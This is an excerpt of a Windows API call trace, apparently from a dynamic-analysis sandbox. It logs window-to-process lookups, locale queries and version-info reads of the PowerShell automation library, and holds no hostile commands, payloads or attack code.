	[0386.412] GetWindowThreadProcessId (in: hWnd=0x101a0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x1ec
	[0386.413] GetWindowThreadProcessId (in: hWnd=0x1019c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x440
	[0386.413] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x7e8
	[0386.413] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x730
	[0386.413] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x2c8
	[0386.413] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x31c
	[0386.413] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x330
	[0386.413] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x128
	[0386.413] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x5c8
	[0386.413] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x6f8
	[0386.413] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x358
	[0386.414] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x73c
	[0386.414] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb0
	[0386.414] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x250
	[0386.414] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x240
	[0386.414] GetWindowThreadProcessId (in: hWnd=0x2015e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x790
	[0386.414] GetWindowThreadProcessId (in: hWnd=0x40112, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x61c
	[0386.414] GetWindowThreadProcessId (in: hWnd=0x3015a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x540
	[0386.414] GetWindowThreadProcessId (in: hWnd=0x10150, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x538
	[0386.414] GetWindowThreadProcessId (in: hWnd=0x1014e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x568
	[0386.414] GetWindowThreadProcessId (in: hWnd=0x20144, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x538
	[0386.414] GetWindowThreadProcessId (in: hWnd=0x10138, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x568
	[0386.414] GetWindowThreadProcessId (in: hWnd=0x10130, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x538
	[0386.415] GetWindowThreadProcessId (in: hWnd=0x10126, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x540
	[0386.415] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x540
	[0386.415] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x57c
	[0386.415] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x460
	[0386.415] GetWindowThreadProcessId (in: hWnd=0x10102, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x554
	[0386.415] GetWindowThreadProcessId (in: hWnd=0x50094, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.415] GetWindowThreadProcessId (in: hWnd=0x1008a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x528
	[0386.415] GetWindowThreadProcessId (in: hWnd=0x10088, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.415] GetWindowThreadProcessId (in: hWnd=0x10080, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.416] GetWindowThreadProcessId (in: hWnd=0x1006e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.416] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x79c
	[0386.416] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.416] GetWindowThreadProcessId (in: hWnd=0x10058, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4e0
	[0386.416] GetWindowThreadProcessId (in: hWnd=0x10052, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.416] GetWindowThreadProcessId (in: hWnd=0x1004a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x460
	[0386.416] GetWindowThreadProcessId (in: hWnd=0x20046, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x460
	[0386.416] GetWindowThreadProcessId (in: hWnd=0x30044, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x44c
	[0386.416] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x778
	[0386.416] GetWindowThreadProcessId (in: hWnd=0x100f2, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x460
	[0386.417] GetWindowThreadProcessId (in: hWnd=0x30140, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x558
	[0386.417] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.417] GetWindowThreadProcessId (in: hWnd=0x10054, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4d0
	[0386.417] GetWindowThreadProcessId (in: hWnd=0x1051c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x12d0
	[0386.417] GetWindowThreadProcessId (in: hWnd=0x1050c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x12cc
	[0386.417] GetWindowThreadProcessId (in: hWnd=0x104fc, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x12c8
	[0386.417] GetWindowThreadProcessId (in: hWnd=0x104da, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x1290
	[0386.417] GetWindowThreadProcessId (in: hWnd=0x104d0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x1218
	[0386.417] GetWindowThreadProcessId (in: hWnd=0x104cc, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x1214
	[0386.417] GetWindowThreadProcessId (in: hWnd=0x104ca, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x11ec
	[0386.418] GetWindowThreadProcessId (in: hWnd=0x104c6, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x11e8
	[0386.418] GetWindowThreadProcessId (in: hWnd=0x202b4, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x11cc
	[0386.418] GetWindowThreadProcessId (in: hWnd=0x202b6, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x1140
	[0386.418] GetWindowThreadProcessId (in: hWnd=0x104be, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xe6c
	[0386.418] GetWindowThreadProcessId (in: hWnd=0x104ae, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x6e8
	[0386.418] GetWindowThreadProcessId (in: hWnd=0x10490, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xc6c
	[0386.418] GetWindowThreadProcessId (in: hWnd=0x10480, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xf94
	[0386.418] GetWindowThreadProcessId (in: hWnd=0x10470, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xffc
	[0386.418] GetWindowThreadProcessId (in: hWnd=0x10460, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xf74
	[0386.418] GetWindowThreadProcessId (in: hWnd=0x1044e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xf08
	[0386.418] GetWindowThreadProcessId (in: hWnd=0x10442, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xf0c
	[0386.418] GetWindowThreadProcessId (in: hWnd=0x1043a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xed8
	[0386.419] GetWindowThreadProcessId (in: hWnd=0x10436, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xe90
	[0386.419] GetWindowThreadProcessId (in: hWnd=0x10432, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xea8
	[0386.419] GetWindowThreadProcessId (in: hWnd=0x10416, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xfa8
	[0386.419] GetWindowThreadProcessId (in: hWnd=0x10412, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xfbc
	[0386.419] GetWindowThreadProcessId (in: hWnd=0x1040e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xfb8
	[0386.419] GetWindowThreadProcessId (in: hWnd=0x1040a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xfb4
	[0386.420] GetWindowThreadProcessId (in: hWnd=0x10406, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xfb0
	[0386.420] GetWindowThreadProcessId (in: hWnd=0x10402, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xfac
	[0386.420] GetWindowThreadProcessId (in: hWnd=0x103fe, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xfc0
	[0386.420] GetWindowThreadProcessId (in: hWnd=0x103f0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xfd0
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x1039a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xf88
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x1038a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xf84
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x10382, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xf80
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x1036e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xde0
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x1036a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xddc
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x10366, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xdd8
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x10360, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xd34
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x10358, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xd10
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x20276, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xd0c
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x800a4, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xc9c
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x10346, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xc74
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x1032c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xc1c
	[0386.421] GetWindowThreadProcessId (in: hWnd=0x10318, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xc08
	[0386.422] GetWindowThreadProcessId (in: hWnd=0x102fa, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xabc
	[0386.422] GetWindowThreadProcessId (in: hWnd=0x102e0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x24c
	[0386.422] GetWindowThreadProcessId (in: hWnd=0x102dc, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xbb0
	[0386.422] GetWindowThreadProcessId (in: hWnd=0x102d2, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xbfc
	[0386.422] GetWindowThreadProcessId (in: hWnd=0x102ce, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb10
	[0386.422] GetWindowThreadProcessId (in: hWnd=0x102ca, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x374
	[0386.422] GetWindowThreadProcessId (in: hWnd=0x102c6, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x368
	[0386.422] GetWindowThreadProcessId (in: hWnd=0x102c2, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb28
	[0386.422] GetWindowThreadProcessId (in: hWnd=0x102be, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xae8
	[0386.422] GetWindowThreadProcessId (in: hWnd=0x102b2, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb14
	[0386.422] GetWindowThreadProcessId (in: hWnd=0x102ae, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x95c
	[0386.422] GetWindowThreadProcessId (in: hWnd=0x102aa, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xa8c
	[0386.423] GetWindowThreadProcessId (in: hWnd=0x202a0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x46c
	[0386.423] GetWindowThreadProcessId (in: hWnd=0x10264, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb3c
	[0386.423] GetWindowThreadProcessId (in: hWnd=0x10254, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xa90
	[0386.423] GetWindowThreadProcessId (in: hWnd=0x10244, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xad0
	[0386.423] GetWindowThreadProcessId (in: hWnd=0x1022a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xa9c
	[0386.423] GetWindowThreadProcessId (in: hWnd=0x10226, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xaa0
	[0386.423] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb1c
	[0386.423] GetWindowThreadProcessId (in: hWnd=0x1021e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x7e0
	[0386.423] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xa74
	[0386.423] GetWindowThreadProcessId (in: hWnd=0x20208, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x694
	[0386.423] GetWindowThreadProcessId (in: hWnd=0x401f0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xa28
	[0386.423] GetWindowThreadProcessId (in: hWnd=0x1020c, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x9b0
	[0386.424] GetWindowThreadProcessId (in: hWnd=0x10202, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x8d8
	[0386.424] GetWindowThreadProcessId (in: hWnd=0x201ca, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x940
	[0386.424] GetWindowThreadProcessId (in: hWnd=0x201d8, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x93c
	[0386.424] GetWindowThreadProcessId (in: hWnd=0x301e2, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4ec
	[0386.424] GetWindowThreadProcessId (in: hWnd=0x201de, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x150
	[0386.424] GetWindowThreadProcessId (in: hWnd=0x201c8, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x720
	[0386.424] GetWindowThreadProcessId (in: hWnd=0x301f4, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x3c4
	[0386.424] GetWindowThreadProcessId (in: hWnd=0x301c0, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x7d4
	[0386.431] GetWindowThreadProcessId (in: hWnd=0x301c4, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x6c8
	[0386.431] GetWindowThreadProcessId (in: hWnd=0x4011e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb54
	[0386.431] GetWindowThreadProcessId (in: hWnd=0x50122, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb54
	[0386.431] GetWindowThreadProcessId (in: hWnd=0x501b8, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb5c
	[0386.431] GetWindowThreadProcessId (in: hWnd=0x101b2, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x838
	[0386.431] GetWindowThreadProcessId (in: hWnd=0x101ae, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x818
	[0386.431] GetWindowThreadProcessId (in: hWnd=0x101aa, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x5b8
	[0386.431] GetWindowThreadProcessId (in: hWnd=0x101a6, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x494
	[0386.431] GetWindowThreadProcessId (in: hWnd=0x101a2, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x1ec
	[0386.431] GetWindowThreadProcessId (in: hWnd=0x1019e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x440
	[0386.431] GetWindowThreadProcessId (in: hWnd=0x1019a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x7e8
	[0386.431] GetWindowThreadProcessId (in: hWnd=0x10196, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x730
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x2c8
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x31c
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x330
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x128
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x5c8
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x6f8
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x358
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x10176, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x73c
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0xb0
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x250
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x240
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x20160, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x790
	[0386.432] GetWindowThreadProcessId (in: hWnd=0x70110, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x61c
	[0386.433] GetWindowThreadProcessId (in: hWnd=0x1013a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x568
	[0386.433] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x538
	[0386.433] GetWindowThreadProcessId (in: hWnd=0x10128, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x540
	[0386.433] GetWindowThreadProcessId (in: hWnd=0x20104, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x460
	[0386.433] GetWindowThreadProcessId (in: hWnd=0x2002a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x79c
	[0386.433] GetWindowThreadProcessId (in: hWnd=0x1005a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x4e0
	[0386.433] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x460
	[0386.433] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x20dae0 | out: lpdwProcessId=0x20dae0) returned 0x778
	[0386.436] WerSetFlags () returned 0x0
	[0386.442] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0386.837] CoTaskMemFree (pv=0x0) 
	[0386.838] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x20de48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x20de40 | out: pulNumLanguages=0x20de48, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x20de40) returned 1
	[0386.838] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x20de48, pwszLanguagesBuffer=0x2e04938, pcchLanguagesBuffer=0x20de40 | out: pulNumLanguages=0x20de48, pwszLanguagesBuffer=0x2e04938, pcchLanguagesBuffer=0x20de40) returned 1
	[0386.843] CoTaskMemAlloc (cb=0x24) returned 0x3a7490
	[0386.843] GetUserDefaultLocaleName (in: lpLocaleName=0x3a7490, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0386.843] CoTaskMemFree (pv=0x3a7490) 
	[0386.864] CoTaskMemAlloc (cb=0x104) returned 0x3b1d80
	[0386.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1d80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0386.864] CoTaskMemFree (pv=0x3b1d80) 
	[0386.866] CoTaskMemAlloc (cb=0x104) returned 0x3b1d80
	[0386.866] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1d80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0386.866] CoTaskMemFree (pv=0x3b1d80) 
	[0386.868] CoTaskMemAlloc (cb=0x104) returned 0x3b1d80
	[0386.868] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3b1d80, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0386.868] CoTaskMemFree (pv=0x3b1d80) 
	[0386.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0386.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x20d8b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0386.878] SetErrorMode (uMode=0x1) returned 0x1
	[0386.878] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x20dac0 | out: lpFileInformation=0x20dac0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0386.878] SetErrorMode (uMode=0x1) returned 0x1
	[0386.878] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x20dd30 | out: lpdwHandle=0x20dd30) returned 0x94c
	[0386.879] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2e081c8 | out: lpData=0x2e081c8) returned 1
	[0386.880] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x20dca8, puLen=0x20dca0 | out: lplpBuffer=0x20dca8*=0x2e08264, puLen=0x20dca0) returned 1
	[0386.880] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x2e08340, puLen=0x20dc10) returned 1
	[0386.880] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0386.880] CoTaskMemAlloc (cb=0x2e) returned 0x3095e0
	[0386.880] lstrcpyW (in: lpString1=0x3095e0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0386.880] CoTaskMemFree (pv=0x3095e0) 
	[0386.880] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x2e08394, puLen=0x20dc10) returned 1
	[0386.880] lstrlenW (lpString="System.Management.Automation") returned 28
	[0386.880] CoTaskMemAlloc (cb=0x3c) returned 0x3b08b0
	[0386.880] lstrcpyW (in: lpString1=0x3b08b0, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0386.880] CoTaskMemFree (pv=0x3b08b0) 
	[0386.880] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x2e083f0, puLen=0x20dc10) returned 1
	[0386.880] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0386.880] CoTaskMemAlloc (cb=0x20) returned 0x3ad5b0
	[0386.880] lstrcpyW (in: lpString1=0x3ad5b0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0386.880] CoTaskMemFree (pv=0x3ad5b0) 
	[0386.880] VerQueryValueW (in: pBlock=0x2e081c8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x20dc18, puLen=0x20dc10 | out: lplpBuffer=0x20dc18*=0x2e08430, puLen=0x20dc10) returned 1
	[0386.880] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0386.880] CoTaskMemAlloc (cb=0x44) returned 0x3b08b0
